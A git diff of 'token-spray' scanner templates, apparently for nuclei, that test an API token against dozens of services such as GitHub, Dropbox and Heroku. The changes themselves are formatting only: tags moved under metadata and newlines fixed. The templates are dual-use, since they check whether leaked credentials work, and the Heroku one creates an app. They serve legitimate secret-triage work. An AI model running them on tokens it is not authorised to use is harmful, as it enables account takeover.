b/http/token-spray/api-blitapp.yaml @@ -8,11 +8,12 @@ info: reference: - https://blitapp.com/api/ - https://github.com/daffainfo/all-about-apikey/tree/main/blitapp - tags: token-spray,blitapp metadata: max-request: 1 + tags: token-spray,blitapp self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-block.yaml b/http/token-spray/api-block.yaml index e49b0fa9a4..5efc8dd1f7 100644 --- a/http/token-spray/api-block.yaml +++ b/http/token-spray/api-block.yaml @@ -8,11 +8,12 @@ info: reference: - https://block.io/docs/basic - https://github.com/daffainfo/all-about-apikey/tree/main/block - tags: token-spray,block metadata: max-request: 1 + tags: token-spray,block self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-blockchain.yaml b/http/token-spray/api-blockchain.yaml index 7d9625d23b..ab209134b6 100644 --- a/http/token-spray/api-blockchain.yaml +++ b/http/token-spray/api-blockchain.yaml @@ -10,11 +10,12 @@ info: - https://github.com/daffainfo/all-about-apikey/tree/main/blockchain classification: cwe-id: CWE-200 - tags: token-spray,blockchain metadata: max-request: 1 + tags: token-spray,blockchain self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-blockfrost.yaml b/http/token-spray/api-blockfrost.yaml index e823908bb0..908812d5ec 100644 --- a/http/token-spray/api-blockfrost.yaml +++ b/http/token-spray/api-blockfrost.yaml @@ -8,11 +8,12 @@ info: reference: - https://docs.blockfrost.io/ - https://github.com/daffainfo/all-about-apikey/tree/main/blockfrost - tags: token-spray,blockfrost metadata: max-request: 1 + tags: token-spray,blockfrost self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-box.yaml b/http/token-spray/api-box.yaml index 4432cc3204..a009f26745 100644 --- a/http/token-spray/api-box.yaml +++ b/http/token-spray/api-box.yaml @@ -8,11 +8,12 @@ info: reference: - https://developer.box.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/box - tags: token-spray,box metadata: max-request: 1 + tags: token-spray,box self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-bravenewcoin.yaml b/http/token-spray/api-bravenewcoin.yaml index 73632e927f..83707ec439 100644 --- a/http/token-spray/api-bravenewcoin.yaml +++ b/http/token-spray/api-bravenewcoin.yaml @@ -8,11 +8,12 @@ info: reference: - https://bravenewcoin.com/developers - https://github.com/daffainfo/all-about-apikey/tree/main/brave-new-coin - tags: token-spray,bravenewcoin metadata: max-request: 1 + tags: token-spray,bravenewcoin self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-browshot.yaml b/http/token-spray/api-browshot.yaml index 054cb3a9c3..ea61628201 100644 --- a/http/token-spray/api-browshot.yaml +++ b/http/token-spray/api-browshot.yaml @@ -8,11 +8,12 @@ info: reference: - https://browshot.com/api/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/browshot - tags: token-spray,browshot metadata: max-request: 1 + tags: token-spray,browshot self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-buildkite.yaml b/http/token-spray/api-buildkite.yaml index 6520307068..de447d9b9a 100644 --- a/http/token-spray/api-buildkite.yaml +++ b/http/token-spray/api-buildkite.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://buildkite.com/docs/apis/rest-api/user - tags: token-spray,buildkite metadata: max-request: 1 + tags: token-spray,buildkite self-contained: true + http: - method: GET path: - "https://api.buildkite.com/v2/user" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body @@ -25,4 +26,4 @@ http: - '"id":' - '"graphql_id":' - '"email":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-buttercms.yaml b/http/token-spray/api-buttercms.yaml index b22aa06da8..f4f356999e 100644 --- a/http/token-spray/api-buttercms.yaml +++ b/http/token-spray/api-buttercms.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://buttercms.com/docs/api/#introduction - tags: token-spray,buttercms metadata: max-request: 1 + tags: token-spray,buttercms self-contained: true + http: - method: GET path: @@ -23,4 +24,4 @@ http: - '"meta":' - '"data":' - '"url":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-c99.yaml b/http/token-spray/api-c99.yaml index 8594dbe046..4dcc64d2cb 100644 --- a/http/token-spray/api-c99.yaml +++ b/http/token-spray/api-c99.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://api.c99.nl - tags: c99,api,token-spray metadata: max-request: 1 + tags: c99,api,token-spray self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-calendarific.yaml b/http/token-spray/api-calendarific.yaml index b3f2d48c2c..7510caa20d 100644 --- a/http/token-spray/api-calendarific.yaml +++ b/http/token-spray/api-calendarific.yaml @@ -8,11 +8,12 @@ info: reference: - https://calendarific.com/api-documentation - https://github.com/daffainfo/all-about-apikey/tree/main/calendarific - tags: token-spray,calendarific metadata: max-request: 1 + tags: token-spray,calendarific self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-calendly.yaml b/http/token-spray/api-calendly.yaml index 93029deba0..5e4bc13845 100644 --- a/http/token-spray/api-calendly.yaml +++ b/http/token-spray/api-calendly.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://calendly.stoplight.io/docs/api-docs-v1/b3A6MTg3MDczNg-about-me - tags: token-spray,calendly metadata: max-request: 1 + tags: token-spray,calendly self-contained: true + http: - method: GET path: - "https://calendly.com/api/v1/users/me" + headers: X-Token: "{{token}}" - matchers: - type: word part: body @@ -25,4 +26,4 @@ http: - '"data":' - '"id":' - '"email":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-chaos.yaml b/http/token-spray/api-chaos.yaml index 9c32cefda3..e4cd89214e 100644 --- a/http/token-spray/api-chaos.yaml +++ b/http/token-spray/api-chaos.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://chaos.projectdiscovery.io/#/docs - tags: recon,chaos,token-spray,projectdiscovery metadata: max-request: 1 + tags: recon,chaos,token-spray,projectdiscovery self-contained: true + http: - method: GET path: - "https://dns.projectdiscovery.io/dns/projectdiscovery.io" + headers: Authorization: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/api-charity.yaml b/http/token-spray/api-charity.yaml index 49b90367f9..fba8c26f6c 100644 --- a/http/token-spray/api-charity.yaml +++ b/http/token-spray/api-charity.yaml @@ -8,11 +8,12 @@ info: reference: - http://charityapi.orghunter.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/charity-search - tags: token-spray,charity,search metadata: max-request: 1 + tags: token-spray,charity,search self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-circleci.yaml b/http/token-spray/api-circleci.yaml index 48886b3797..45503f989e 100644 --- a/http/token-spray/api-circleci.yaml +++ b/http/token-spray/api-circleci.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://circleci.com/docs/api/v1 - tags: token-spray,circleci metadata: max-request: 1 + tags: token-spray,circleci self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-clearbit.yaml b/http/token-spray/api-clearbit.yaml index 8b5cd01f0b..6dc5dc910d 100644 --- a/http/token-spray/api-clearbit.yaml +++ b/http/token-spray/api-clearbit.yaml @@ -8,11 +8,12 @@ info: reference: - https://clearbit.com/docs - https://github.com/daffainfo/all-about-apikey/tree/main/clearbit - tags: token-spray,clearbit metadata: max-request: 1 + tags: token-spray,clearbit self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-clickup.yaml b/http/token-spray/api-clickup.yaml index 7f3cb7191f..e8782d4645 100644 --- a/http/token-spray/api-clickup.yaml +++ b/http/token-spray/api-clickup.yaml @@ -8,11 +8,12 @@ info: reference: - https://clickup.com/api - https://github.com/daffainfo/all-about-apikey/tree/main/clickup - tags: token-spray,clickup metadata: max-request: 1 + tags: token-spray,clickup self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-clockify.yaml b/http/token-spray/api-clockify.yaml index 56d3da3fe8..d5f8c7b29a 100644 --- a/http/token-spray/api-clockify.yaml +++ b/http/token-spray/api-clockify.yaml @@ -8,11 +8,12 @@ info: reference: - https://clockify.me/developers-api - https://github.com/daffainfo/all-about-apikey/tree/main/clockify - tags: token-spray,clockify metadata: max-request: 1 + tags: token-spray,clockify self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-cloudconvert.yaml b/http/token-spray/api-cloudconvert.yaml index 1f407fbdb8..aa2f0b7e5f 100644 --- a/http/token-spray/api-cloudconvert.yaml +++ b/http/token-spray/api-cloudconvert.yaml @@ -8,11 +8,12 @@ info: reference: - https://cloudconvert.com/api/v2 - https://github.com/daffainfo/all-about-apikey/tree/main/cloudconvert - tags: token-spray,cloudconvert metadata: max-request: 1 + tags: token-spray,cloudconvert self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-cloudflare.yaml b/http/token-spray/api-cloudflare.yaml index 4932a1a001..e145c8c0de 100644 --- a/http/token-spray/api-cloudflare.yaml +++ b/http/token-spray/api-cloudflare.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://dash.cloudflare.com/profile/api-tokens - tags: token-spray,cloudflare metadata: max-request: 1 + tags: token-spray,cloudflare self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-codestats.yaml b/http/token-spray/api-codestats.yaml index c7a02aee91..cd0c53117d 100644 --- a/http/token-spray/api-codestats.yaml +++ b/http/token-spray/api-codestats.yaml @@ -8,11 +8,12 @@ info: reference: - https://codestats.net/api-docs - https://github.com/daffainfo/all-about-apikey/tree/main/codestats - tags: token-spray,codestats metadata: max-request: 1 + tags: token-spray,codestats self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-coinapi.yaml b/http/token-spray/api-coinapi.yaml index f2c747832f..986eae5aae 100644 --- a/http/token-spray/api-coinapi.yaml +++ b/http/token-spray/api-coinapi.yaml @@ -8,11 +8,12 @@ info: reference: - https://docs.coinapi.io/ - https://github.com/daffainfo/all-about-apikey/tree/main/coinapi - tags: token-spray,coinapi metadata: max-request: 1 + tags: token-spray,coinapi self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-coinlayer.yaml b/http/token-spray/api-coinlayer.yaml index 616cad06fd..b567ab6d91 100644 --- a/http/token-spray/api-coinlayer.yaml +++ b/http/token-spray/api-coinlayer.yaml @@ -8,11 +8,12 @@ info: reference: - https://coinlayer.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/coinlayer - tags: token-spray,coinlayer metadata: max-request: 1 + tags: token-spray,coinlayer self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-coinmarketcap.yaml b/http/token-spray/api-coinmarketcap.yaml index 210a4633f4..ab42b5e2b6 100644 --- a/http/token-spray/api-coinmarketcap.yaml +++ b/http/token-spray/api-coinmarketcap.yaml @@ -8,11 +8,12 @@ info: reference: - https://coinmarketcap.com/api/documentation/v1 - https://github.com/daffainfo/all-about-apikey/tree/main/coinmarketcap - tags: token-spray,coinmarketcap metadata: max-request: 1 + tags: token-spray,coinmarketcap self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-coinranking.yaml b/http/token-spray/api-coinranking.yaml index 71c910d3b0..dfdb1a8f5a 100644 --- a/http/token-spray/api-coinranking.yaml +++ b/http/token-spray/api-coinranking.yaml @@ -8,11 +8,12 @@ info: reference: - https://developers.coinranking.com/api/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/coinranking - tags: token-spray,coinranking metadata: max-request: 1 + tags: token-spray,coinranking self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-cooperhewitt.yaml b/http/token-spray/api-cooperhewitt.yaml index baf3c21e43..bb1fe10c18 100644 --- a/http/token-spray/api-cooperhewitt.yaml +++ b/http/token-spray/api-cooperhewitt.yaml @@ -8,11 +8,12 @@ info: reference: - https://collection.cooperhewitt.org/api/methods/ - https://github.com/daffainfo/all-about-apikey/tree/main/cooper-hewitt - tags: token-spray,cooperhewitt metadata: max-request: 1 + tags: token-spray,cooperhewitt self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-covalent.yaml b/http/token-spray/api-covalent.yaml index d818ab0ee1..9d719f9081 100644 --- a/http/token-spray/api-covalent.yaml +++ b/http/token-spray/api-covalent.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.covalenthq.com/docs/api/ - https://github.com/daffainfo/all-about-apikey/tree/main/covalent - tags: token-spray,covalent metadata: max-request: 1 + tags: token-spray,covalent self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-craftmypdf.yaml b/http/token-spray/api-craftmypdf.yaml index ffd5c2e5b4..b21a31f6b6 100644 --- a/http/token-spray/api-craftmypdf.yaml +++ b/http/token-spray/api-craftmypdf.yaml @@ -8,11 +8,12 @@ info: reference: - https://pdflayer.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/craftmypdf - tags: token-spray,craftmypdf metadata: max-request: 1 + tags: token-spray,craftmypdf self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-currencyfreaks.yaml b/http/token-spray/api-currencyfreaks.yaml index a291362bac..1daec9627a 100644 --- a/http/token-spray/api-currencyfreaks.yaml +++ b/http/token-spray/api-currencyfreaks.yaml @@ -8,11 +8,12 @@ info: reference: - https://currencyfreaks.com/documentation.html - https://github.com/daffainfo/all-about-apikey/tree/main/currencyfreaks - tags: token-spray,currencyfreaks metadata: max-request: 1 + tags: token-spray,currencyfreaks self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-currencylayer.yaml b/http/token-spray/api-currencylayer.yaml index 4db43b4d0c..ca6b84238e 100644 --- a/http/token-spray/api-currencylayer.yaml +++ b/http/token-spray/api-currencylayer.yaml @@ -8,11 +8,12 @@ info: reference: - https://currencylayer.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/currencylayer - tags: token-spray,currencylayer metadata: max-request: 1 + tags: token-spray,currencylayer self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-currencyscoop.yaml b/http/token-spray/api-currencyscoop.yaml index c9887b6b6f..b45e8929d2 100644 --- a/http/token-spray/api-currencyscoop.yaml +++ b/http/token-spray/api-currencyscoop.yaml @@ -8,11 +8,12 @@ info: reference: - https://currencyscoop.com/api-documentation - https://github.com/daffainfo/all-about-apikey/tree/main/currencyscoop - tags: token-spray,currencyscoop metadata: max-request: 1 + tags: token-spray,currencyscoop self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-dbt.yaml b/http/token-spray/api-dbt.yaml index 971dd7437e..9dfd09d97b 100644 --- a/http/token-spray/api-dbt.yaml +++ b/http/token-spray/api-dbt.yaml @@ -9,21 +9,22 @@ info: - https://docs.getdbt.com/docs/introduction classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: token-spray,dbt metadata: max-request: 1 + tags: token-spray,dbt self-contained: true + http: - method: GET path: - "https://cloud.getdbt.com/api/v2/accounts/" + headers: Content-Type: application/json Authorization: Token {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-ddownload.yaml b/http/token-spray/api-ddownload.yaml index 8cc5ab7f27..f5aa4eaf22 100644 --- a/http/token-spray/api-ddownload.yaml +++ b/http/token-spray/api-ddownload.yaml @@ -8,11 +8,12 @@ info: reference: - https://ddownload.com/api - https://github.com/daffainfo/all-about-apikey/tree/main/ddownload - tags: token-spray,ddownload metadata: max-request: 1 + tags: token-spray,ddownload self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-debounce.yaml b/http/token-spray/api-debounce.yaml index d7d20113ee..c915296307 100644 --- a/http/token-spray/api-debounce.yaml +++ b/http/token-spray/api-debounce.yaml @@ -7,11 +7,12 @@ info: reference: - https://developers.debounce.io/reference/api-key-authentication - https://debounce.io - tags: debounce,token-spray metadata: max-request: 1 + tags: debounce,token-spray self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-deviantart.yaml b/http/token-spray/api-deviantart.yaml index 590b23150a..671ca490ea 100644 --- a/http/token-spray/api-deviantart.yaml +++ b/http/token-spray/api-deviantart.yaml @@ -6,17 +6,18 @@ info: severity: info reference: - https://www.deviantart.com/developers/authentication - tags: token-spray,deviantart metadata: max-request: 1 + tags: token-spray,deviantart self-contained: true + http: - method: POST path: - "https://www.deviantart.com/api/v1/oauth2/placebo" - body: "access_token={{token}}" + body: "access_token={{token}}" matchers: - type: word part: body diff --git a/http/token-spray/api-digitalocean.yaml b/http/token-spray/api-digitalocean.yaml index d1aabea5c3..c0191147a2 100644 --- a/http/token-spray/api-digitalocean.yaml +++ b/http/token-spray/api-digitalocean.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://docs.digitalocean.com/reference/api/ - tags: token-spray,digitalocean metadata: max-request: 1 + tags: token-spray,digitalocean self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-dribbble.yaml b/http/token-spray/api-dribbble.yaml index 4a7476967b..bfe9229cf5 100644 --- a/http/token-spray/api-dribbble.yaml +++ b/http/token-spray/api-dribbble.yaml @@ -8,11 +8,12 @@ info: reference: - https://developer.dribbble.com/v2/ - https://github.com/daffainfo/all-about-apikey/tree/main/dribbble - tags: token-spray,dribbble metadata: max-request: 1 + tags: token-spray,dribbble self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-dropbox.yaml b/http/token-spray/api-dropbox.yaml index d54986827b..de5d30f742 100644 --- a/http/token-spray/api-dropbox.yaml +++ b/http/token-spray/api-dropbox.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://www.dropbox.com/developers/documentation/http/documentation - tags: token-spray,dropbox metadata: max-request: 1 + tags: token-spray,dropbox self-contained: true + http: - method: POST path: - "https://api.dropboxapi.com/2/users/get_current_account" + headers: Authorization: Bearer {{token}} - matchers: - type: word part: body diff --git a/http/token-spray/api-ebird.yaml b/http/token-spray/api-ebird.yaml index 3649090b3e..dc89ef1b14 100644 --- a/http/token-spray/api-ebird.yaml +++ b/http/token-spray/api-ebird.yaml @@ -8,18 +8,19 @@ info: reference: - https://documenter.getpostman.com/view/664302/S1ENwy59 - https://github.com/daffainfo/all-about-apikey/tree/main/ebird - tags: token-spray,ebird metadata: max-request: 1 + tags: token-spray,ebird self-contained: true + http: - method: GET path: - "https://api.ebird.org/v2/data/obs/KZ/recent" + headers: X-eBirdApiToken: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/api-etherscan.yaml b/http/token-spray/api-etherscan.yaml index 121ef3e5d3..c7ad31ee25 100644 --- a/http/token-spray/api-etherscan.yaml +++ b/http/token-spray/api-etherscan.yaml @@ -8,11 +8,12 @@ info: reference: - https://docs.etherscan.io/ - https://github.com/daffainfo/all-about-apikey/tree/main/etherscan - tags: token-spray,etherscan metadata: max-request: 1 + tags: token-spray,etherscan self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-europeana.yaml b/http/token-spray/api-europeana.yaml index cdb57683da..57ce935a7b 100644 --- a/http/token-spray/api-europeana.yaml +++ b/http/token-spray/api-europeana.yaml @@ -8,11 +8,12 @@ info: reference: - https://pro.europeana.eu/page/search - https://github.com/daffainfo/all-about-apikey/tree/main/europeana - tags: token-spray,europeana metadata: max-request: 1 + tags: token-spray,europeana self-contained: true + http: - method: GET path: @@ -25,4 +26,4 @@ http: - 'success' - 'apikey' - 'action' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-exchangerateapi.yaml b/http/token-spray/api-exchangerateapi.yaml index 262fa7d109..30f906f3bd 100644 --- a/http/token-spray/api-exchangerateapi.yaml +++ b/http/token-spray/api-exchangerateapi.yaml @@ -8,11 +8,12 @@ info: reference: - https://www.exchangerate-api.com/docs/overview - https://github.com/daffainfo/all-about-apikey/tree/main/exchangerate-api - tags: token-spray,exchangerateapi metadata: max-request: 1 + tags: token-spray,exchangerateapi self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-facebook.yaml b/http/token-spray/api-facebook.yaml index 2f74bbc205..916e2db734 100644 --- a/http/token-spray/api-facebook.yaml +++ b/http/token-spray/api-facebook.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://developers.facebook.com/tools/explorer/ - tags: token-spray,facebook metadata: max-request: 1 + tags: token-spray,facebook self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-fastly.yaml b/http/token-spray/api-fastly.yaml index f0936ca54f..ea9f495c4e 100644 --- a/http/token-spray/api-fastly.yaml +++ b/http/token-spray/api-fastly.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://developer.fastly.com/reference/api/ - tags: token-spray,fastly metadata: max-request: 1 + tags: token-spray,fastly self-contained: true + http: - method: GET path: - "https://api.fastly.com/current_user" + headers: Fastly-Key: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/api-festivo.yaml b/http/token-spray/api-festivo.yaml index 487a4e742a..18ca3f4d25 100644 --- a/http/token-spray/api-festivo.yaml +++ b/http/token-spray/api-festivo.yaml @@ -8,11 +8,12 @@ info: reference: - https://docs.getfestivo.com/docs/products/public-holidays-api/intro/ - https://github.com/daffainfo/all-about-apikey/tree/main/festivo-public-holidays - tags: token-spray,festivo metadata: max-request: 1 + tags: token-spray,festivo self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-flickr.yaml b/http/token-spray/api-flickr.yaml index 1afff1843d..2564dff576 100644 --- a/http/token-spray/api-flickr.yaml +++ b/http/token-spray/api-flickr.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://www.flickr.com/services/developer/api/ - tags: token-spray,flickr metadata: max-request: 1 + tags: token-spray,flickr self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-flowdash.yaml b/http/token-spray/api-flowdash.yaml index 92279ef751..b72be8a736 100644 --- a/http/token-spray/api-flowdash.yaml +++ b/http/token-spray/api-flowdash.yaml @@ -8,11 +8,12 @@ info: reference: - https://docs.flowdash.com/docs/api-introduction - https://github.com/daffainfo/all-about-apikey/tree/main/flowdash - tags: token-spray,flowdash metadata: max-request: 1 + tags: token-spray,flowdash self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-fontawesome.yaml b/http/token-spray/api-fontawesome.yaml index 6a953b2ec0..ec97bbb344 100644 --- a/http/token-spray/api-fontawesome.yaml +++ b/http/token-spray/api-fontawesome.yaml @@ -6,15 +6,17 @@ info: severity: info reference: - https://fontawesome.com/v6.0/docs/apis/graphql/get-started - tags: token-spray,fontawesome metadata: max-request: 1 + tags: token-spray,fontawesome self-contained: true + http: - method: GET path: - "https://api.fontawesome.com/token" + headers: Authorization: Bearer {{token}} diff --git a/http/token-spray/api-fortitoken-cloud.yaml b/http/token-spray/api-fortitoken-cloud.yaml index cdcc4999c9..2f9828a2d7 100644 --- a/http/token-spray/api-fortitoken-cloud.yaml +++ b/http/token-spray/api-fortitoken-cloud.yaml @@ -6,15 +6,17 @@ info: severity: info reference: - https://docs.fortinet.com/document/fortitoken-cloud/latest/rest-api/456035/overview - tags: token-spray,fortinet metadata: max-request: 1 + tags: token-spray,fortinet self-contained: true + http: - method: GET path: - "https://ftc.fortinet.com:9696/api/v1/user" + headers: Authorization: Bearer {{token}} diff --git a/http/token-spray/api-front.yaml b/http/token-spray/api-front.yaml index b36d38e041..1606031982 100644 --- a/http/token-spray/api-front.yaml +++ b/http/token-spray/api-front.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://dev.frontapp.com/reference/introduction - tags: token-spray,front metadata: max-request: 1 + tags: token-spray,front self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-fullhunt.yaml b/http/token-spray/api-fullhunt.yaml index adb6c3ae82..1521dd2b31 100644 --- a/http/token-spray/api-fullhunt.yaml +++ b/http/token-spray/api-fullhunt.yaml @@ -9,18 +9,19 @@ info: reference: - https://fullhunt.io - https://api-docs.fullhunt.io - tags: scan,recon,fullhunt,token-spray metadata: max-request: 1 + tags: scan,recon,fullhunt,token-spray self-contained: true + http: - method: GET path: - https://fullhunt.io/api/v1/domain/interact.sh/details + headers: X-API-Key: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/api-giphy.yaml b/http/token-spray/api-giphy.yaml index 716892b669..71360af293 100644 --- a/http/token-spray/api-giphy.yaml +++ b/http/token-spray/api-giphy.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://developers.giphy.com/branch/master/docs/api/ - tags: token-spray,giphy metadata: max-request: 1 + tags: token-spray,giphy self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-github.yaml b/http/token-spray/api-github.yaml index 7479bbad65..4e0528c753 100644 --- a/http/token-spray/api-github.yaml +++ b/http/token-spray/api-github.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://docs.github.com/en/rest/reference/users - tags: token-spray,github metadata: max-request: 1 + tags: token-spray,github self-contained: true + http: - method: GET path: - "https://api.github.com/user" + headers: Authorization: Basic {{base64('user:' + token)}} - matchers: - type: word part: body diff --git a/http/token-spray/api-gitlab.yaml b/http/token-spray/api-gitlab.yaml index 61ca04213b..10ea65f57f 100644 --- a/http/token-spray/api-gitlab.yaml +++ b/http/token-spray/api-gitlab.yaml @@ -6,18 +6,19 @@ info: severity: info reference: - https://docs.gitlab.com/ee/api/personal_access_tokens.html - tags: token-spray,gitlab metadata: max-request: 1 + tags: token-spray,gitlab self-contained: true + http: - method: GET path: - "https://gitlab.com/api/v4/personal_access_tokens" + headers: PRIVATE-TOKEN: "{{token}}" - matchers: - type: word part: body diff --git a/http/token-spray/api-gofile.yaml b/http/token-spray/api-gofile.yaml index 96c7884985..b2d2efb394 100644 --- a/http/token-spray/api-gofile.yaml +++ b/http/token-spray/api-gofile.yaml @@ -8,11 +8,12 @@ info: reference: - https://gofile.io/api - https://github.com/daffainfo/all-about-apikey/tree/main/gofile - tags: token-spray,gofile metadata: max-request: 1 + tags: token-spray,gofile self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-google-drive.yaml b/http/token-spray/api-google-drive.yaml index d870431223..dcb0352c6d 100644 --- a/http/token-spray/api-google-drive.yaml +++ b/http/token-spray/api-google-drive.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://developers.google.com/drive/api/guides/about-sdk - tags: token-spray,google,drive metadata: max-request: 1 + tags: token-spray,google,drive,intrusive self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-gorest.yaml b/http/token-spray/api-gorest.yaml index a6f6c94ea7..4ad9468314 100644 --- a/http/token-spray/api-gorest.yaml +++ b/http/token-spray/api-gorest.yaml @@ -8,11 +8,12 @@ info: reference: - https://gorest.co.in/ - https://github.com/daffainfo/all-about-apikey/tree/main/gorest - tags: token-spray,gorest metadata: max-request: 1 + tags: token-spray,gorest self-contained: true + http: - raw: - | diff --git a/http/token-spray/api-harvardart.yaml b/http/token-spray/api-harvardart.yaml index d033811b46..ade1d854d8 100644 --- a/http/token-spray/api-harvardart.yaml +++ b/http/token-spray/api-harvardart.yaml @@ -8,11 +8,12 @@ info: reference: - https://github.com/harvardartmuseums/api-docs - https://github.com/daffainfo/all-about-apikey/tree/main/harvard-art-museums - tags: token-spray,harvardart metadata: max-request: 1 + tags: token-spray,harvardart self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-heroku.yaml b/http/token-spray/api-heroku.yaml index 1593f93a7b..ada0112c7e 100644 --- a/http/token-spray/api-heroku.yaml +++ b/http/token-spray/api-heroku.yaml @@ -6,23 +6,24 @@ info: severity: info reference: - https://devcenter.heroku.com/articles/platform-api-quickstart#calling-the-api - tags: token-spray,heroku metadata: max-request: 1 + tags: token-spray,heroku self-contained: true + http: - method: POST path: - "https://api.heroku.com/apps" + headers: Accept: application/vnd.heroku+json; version=3 Authorization: Bearer {{token}} - matchers: - type: word part: body words: - '"created_at":' - '"git_url":' - condition: and \ No newline at end of file + condition: and diff --git a/http/token-spray/api-hirak-rates.yaml b/http/token-spray/api-hirak-rates.yaml index 28b389f849..e618a0fb14 100644 --- a/http/token-spray/api-hirak-rates.yaml +++ b/http/token-spray/api-hirak-rates.yaml @@ -8,11 +8,12 @@ info: reference: - https://rates.hirak.site/ - https://github.com/daffainfo/all-about-apikey/tree/main/hirak-exchange-rates - tags: token-spray,hirak metadata: max-request: 1 + tags: token-spray,hirak self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-holidayapi.yaml b/http/token-spray/api-holidayapi.yaml index af82506e10..6a511437ac 100644 --- a/http/token-spray/api-holidayapi.yaml +++ b/http/token-spray/api-holidayapi.yaml @@ -8,11 +8,12 @@ info: reference: - https://holidayapi.com/docs - https://github.com/daffainfo/all-about-apikey/tree/main/holiday-api - tags: token-spray,holidayapi metadata: max-request: 1 + tags: token-spray,holidayapi self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-host-io.yaml b/http/token-spray/api-host-io.yaml index 4e8408f6cf..80757b9628 100644 --- a/http/token-spray/api-host-io.yaml +++ b/http/token-spray/api-host-io.yaml @@ -8,11 +8,12 @@ info: reference: - https://host.io/docs - https://github.com/daffainfo/all-about-apikey/tree/main/host-io - tags: token-spray,hostio metadata: max-request: 1 + tags: token-spray,hostio self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-html2pdf.yaml b/http/token-spray/api-html2pdf.yaml index f427080044..7ea7355a58 100644 --- a/http/token-spray/api-html2pdf.yaml +++ b/http/token-spray/api-html2pdf.yaml @@ -8,11 +8,12 @@ info: reference: - https://html2pdf.app/documentation/ - https://github.com/daffainfo/all-about-apikey/tree/main/html2pdf - tags: token-spray,html2pdf metadata: max-request: 1 + tags: token-spray,html2pdf self-contained: true + http: - method: GET path: diff --git a/http/token-spray/api-hubspot.yaml b/http/token-spray/api-hubspot.yaml index f127341b4b..2f846f17e6 100644 --- a/http/token-spray/api-hubspot.yaml +++ b/http/token-spray/api-hubspot.yaml @@ -6,11 +6,12 @@ info: severity: info reference: - https://legacydocs.hubspot.com/docs/methods/owners/get_owners - tags: token-spray,hubspot metadata: max-request: 2 + tags: token-spray,hubspot self-contained: true + http: - method: GET path: @@ -31,4 +32,4 @@ http: words: - '"metaData":' - '"portalId":' - 